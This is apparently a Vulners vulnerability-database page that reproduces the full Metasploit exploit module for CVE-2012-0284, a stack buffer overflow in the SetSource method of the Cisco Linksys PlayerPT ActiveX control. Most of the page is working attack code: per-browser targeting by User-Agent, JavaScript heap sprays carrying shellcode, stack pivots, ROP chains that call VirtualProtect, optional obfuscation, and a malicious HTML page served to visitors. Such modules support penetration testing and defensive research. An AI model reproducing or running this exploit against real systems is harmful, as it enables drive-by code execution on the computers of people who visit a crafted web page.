Vulners
Lucene search
Cisco Linksys PlayerPT - ActiveX Control SetSource sURL argument Buffer Overflow (Metasploit)
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | Cisco Linksys PlayerPT ActiveX Control Buffer Overflow | 27 Jul 201200:00 | – | zdt |
| Cisco Linksys PlayerPT ActiveX Control SetSource sURL argument Buffer Overflow | 3 Aug 201200:00 | – | zdt |
 | CVE-2012-0284 | 22 Mar 201200:00 | – | circl |
 | Cisco Linksys PlayerPT ActiveX Control SetSource() Multiple Overflows | 24 Jul 201200:00 | – | nessus |
 | Cisco Linksys PlayerPT ActiveX Control Buffer overflow (CVE-2012-0284) | 7 Jan 201300:00 | – | checkpoint_advisories |
 | CVE-2012-0284 | 19 Jul 201215:00 | – | cve |
 | CVE-2012-0284 | 19 Jul 201215:00 | – | cvelist |
 | Cisco Linksys PlayerPT ActiveX Control Buffer Overflow | 26 Jul 201211:08 | – | metasploit |
| Cisco Linksys PlayerPT ActiveX Control SetSource sURL Argument Buffer Overflow | 1 Aug 201217:34 | – | metasploit |
 | CVE-2012-0284 | 19 Jul 201215:55 | – | nvd |
10
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::Seh
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "6.0",
:ua_maxver => "9.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:classid => "{9E065E4A-BD9D-4547-8F90-985DC62A5591}",
:method => "SetSource",
:rank => NormalRanking
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco Linksys PlayerPT ActiveX Control SetSource sURL argument Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability found in Cisco Linksys PlayerPT 1.0.0.15
as the installed with the web interface of Cisco Linksys WVC200 Wireless-G PTZ
Internet Video Camera. The vulnerability, due to the insecure usage of sprintf in
the SetSource method, when handling a specially crafted sURL argument, allows to
trigger a stack based buffer overflow which leads to code execution under the
context of the user visiting a malicious web page.
},
'Author' =>
[
'Carsten Eiram', # Vuln discovery
'juan' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2012-0284' ],
[ 'BID', '54588' ],
[ 'URL', 'http://secunia.com/secunia_research/2012-25/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[
'IE 6 on Windows XP SP3',
{
'SprayBlocks' => 0x185,
'SprayOffset' => '0x0',
'Ret' => 0x0c0c0c0c,
'Rop' => nil,
'RandomHeap' => false
}
],
[
'IE 7 on Windows XP SP3 / Windows Vista SP2',
{
'SprayBlocks' => 0x185,
'SprayOffset' => '0x0',
'Ret' => 0x0c0c0c0c,
'Rop' => nil,
'RandomHeap' => false
}
],
[
'IE 8 on Windows XP SP3',
{
'SprayBlocks' => 0x185,
'SprayOffset' => '0x0',
'Ret' => 0x77c3546b, # ret from msvcrt
'StackPivot_1' => 0x77c3546a, # pop ebp; ret from msvcrt
'StackPivot_2' => 0x77c35468, # mov esp,ebp; pop ebp; ret from msvcrt
'Rop' => :msvcrt,
'RopChainOffset' => '0x5f4',
'RandomHeap' => false
}
],
[
'IE 8 with Java 6 on Windows XP SP3',
{
'SprayBlocks' => 0x185,
'SprayOffset' => '0x0',
'Ret' => 0x7c3424f2, # ret from msvcr71.dll
'StackPivot_1' => 0x7c3424f1, # pop ebp; ret from msvcr71.dll
'StackPivot_2' => 0x7c3424ef, # mov esp,ebp; pop ebp; ret from msvcr71.dll
'Rop' => :jre,
'RopChainOffset' => '0x5f4',
'RandomHeap' => false
}
],
[
'IE 8 with Java 6 on Windows 7 SP1/Vista SP2',
{
'SprayBlocks' => 0x185,
'SprayOffset' => '0x0',
'Ret' => 0x7c3424f2, # ret from msvcr71.dll
'StackPivot_1' => 0x7c3424f1, # pop ebp; ret from msvcr71.dll
'StackPivot_2' => 0x7c3424ef, # mov esp,ebp; pop ebp; ret from msvcr71.dll
'Rop' => :jre,
'RopChainOffset' => '0x5f4',
'RandomHeap' => false
}
],
[
'IE 9 with Java 6 on Windows 7 SP1',
{
'SprayBlocks' => 0x1000,
'SprayOffset' => '0x0',
'Ret' => 0x7c3424f2, # ret from msvcr71.dll
'StackPivot_1' => 0x7c3424f1, # pop ebp; ret from msvcr71.dll
'StackPivot_2' => 0x7c3424ef, # mov esp,ebp; pop ebp; ret from msvcr71.dll
'Rop' => :jre,
'RopChainOffset' => '0x5fe',
'RandomHeap' => true,
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jul 17 2012',
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
], self.class
)
end
def get_easy_spray(t, js_code, js_nops)
spray = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var nops = unescape("#{js_nops}");
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, #{t['SprayOffset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var z=1; z < #{t['SprayBlocks']}; z++) {
heap_obj.alloc(block);
}
JS
return spray
end
def get_aligned_spray(t, js_rop, js_code, js_nops, js_90_nops)
spray = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var nops = unescape("#{js_nops}");
var nops_90 = unescape("#{js_90_nops}");
var rop_chain = unescape("#{js_rop}");
while (nops.length < 0x80000) nops += nops;
while (nops_90.length < 0x80000) nops_90 += nops_90;
var offset = nops.substring(0, #{t['SprayOffset']});
var nops_padding = nops.substring(0, #{t['RopChainOffset']}-code.length-offset.length);
var shellcode = offset + code + nops_padding + rop_chain + nops_90.substring(0, 0x800-code.length-nops_padding.length-rop_chain.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var z=1; z < #{t['SprayBlocks']}; z++) {
heap_obj.alloc(block);
}
JS
return spray
end
# Spray published by corelanc0d3r
# Exploit writing tutorial part 11 : Heap Spraying Demystified
# See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
def get_random_spray(t, js_rop, js_code, js_90_nops)
spray = <<-JS
function randomblock(blocksize)
{
var theblock = "";
for (var i = 0; i < blocksize; i++)
{
theblock += Math.floor(Math.random()*90)+10;
}
return theblock;
}
function tounescape(block)
{
var blocklen = block.length;
var unescapestr = "";
for (var i = 0; i < blocklen-1; i=i+4)
{
unescapestr += "%u" + block.substring(i,i+4);
}
return unescapestr;
}
var heap_obj = new heapLib.ie(0x10000);
var rop = unescape("#{js_rop}");
var code = unescape("#{js_code}");
var nops_90 = unescape("#{js_90_nops}");
while (nops_90.length < 0x80000) nops_90 += nops_90;
var offset_length = #{t['RopChainOffset']};
for (var i=0; i < #{t['SprayBlocks']}; i++) {
var padding = unescape(tounescape(randomblock(0x1000)));
while (padding.length < 0x1000) padding+= padding;
var junk_offset = padding.substring(0, offset_length - code.length);
var single_sprayblock = code + junk_offset + rop + nops_90.substring(0, 0x800 - code.length - junk_offset.length - rop.length);
while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;
sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);
heap_obj.alloc(sprayblock);
}
JS
return spray
end
def junk(n=4)
return rand_text_alpha(n).unpack("V").first
end
def nop
return make_nops(4).unpack("V").first
end
def get_stack_pivot(t)
stack_pivot = [
junk,
junk,
junk,
junk,
junk,
t['StackPivot_1'], # pop ebp # ret # ESP points here after controlling EIP with overflow
0x0c0c0c08, # ebp
t['StackPivot_2'] # mov esp,ebp # pop ebp # ret
].pack("V*")
return stack_pivot
end
def get_rop_chain(t)
# Both ROP chains generated by mona.py - See corelan.be
case t['Rop']
when :msvcrt
print_status("Using msvcrt ROP")
rop =
[
0x77C21891, # POP ESI # RETN
0x0c0c0c04, # ESI
0x77c4e392, # POP EAX # RETN
0x77c11120, # <- *&VirtualProtect()
0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
junk,
0x77c2dd6c, # XCHG EAX,ESI # ADD BYTE PTR [EAX],AL # RETN
0x77c4ec00, # POP EBP # RETN
0x77c35459, # ptr to 'push esp # ret'
0x77c47705, # POP EBX # RETN
0x00001000, # EBX
0x77c3ea01, # POP ECX # RETN
0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
0x77c46100, # POP EDI # RETN
0x77c46101, # ROP NOP (-> edi)
0x77c4d680, # POP EDX # RETN
0x00000040, # newProtect (0x40) (-> edx)
0x77c4e392, # POP EAX # RETN
nop, # NOPS (-> eax)
0x77c12df9, # PUSHAD # RETN
].pack("V*")
when :jre
print_status("Using JRE ROP")
rop =
[
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
0x00001000, # (dwSize)
0x7c347f98, # RETN (ROP NOP)
0x7c3415a2, # JMP [EAX]
0xffffffff,
0x7c376402, # skip 4 bytes
0x7c345255, # INC EBX # FPATAN # RETN
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
0x7c344f87, # POP EDX # RETN
0x00000040, # flNewProtect
0x7c34d201, # POP ECX # RETN
0x7c38b001, # &Writable location
0x7c347f97, # POP EAX # RETN
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
0x7c345c30, # ptr to 'push esp # ret '
].pack("V*")
end
return rop
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
return targets[1] #IE 6 on Windows XP SP3
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
return targets[2] #IE 7 on Windows XP SP3
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
return targets[2] #IE 7 on Windows Vista SP2
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
return targets[3] #IE 8 on Windows XP SP3
elsif agent =~ /NT 6\.[01]/ and agent =~ /MSIE 8/
return targets[5] #IE 8 on Windows 7 SP1/Vista SP2
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/
return targets[6] #IE 9 on Windows 7 SP1
else
return nil
end
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
print_status("User-agent: #{agent}")
my_target = get_target(agent)
# Avoid the attack if the victim doesn't have a setup we're targeting
if my_target.nil?
print_error("Browser not supported: #{agent}")
send_not_found(cli)
return
end
p = payload.encoded
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
js_90_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
if not my_target['Rop'].nil?
js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))
end
js = ""
if my_target['RandomHeap']
js = get_random_spray(my_target, js_rop, js_code, js_90_nops)
elsif not my_target['Rop'].nil?
js = get_aligned_spray(my_target, js_rop, js_code, js_nops, js_90_nops)
else
js = get_easy_spray(my_target, js_code, js_nops)
end
js = heaplib(js, {:noobfu => true})
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
end
sploit = "http://"
sploit << "\x0c" * 261
sploit << [my_target.ret].pack("V")
if not my_target['Rop'].nil?
sploit << get_stack_pivot(my_target)
end
sploit << "/img/video.asf"
html = <<-MYHTML
<html>
<head>
<script>
#{js}
</script>
</head>
<body>
<object classid='clsid:9E065E4A-BD9D-4547-8F90-985DC62A5591' id='obj' /></object>
<script>
obj.SetSource("#{sploit}","mpeg","","","");
</script>
</body>
</html>
MYHTML
html = html.gsub(/^\t\t/, '')
print_status("Sending html")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Aug 2012 00:00Current
7High risk
Vulners AI Score7
CVSS 29.3
EPSS0.7316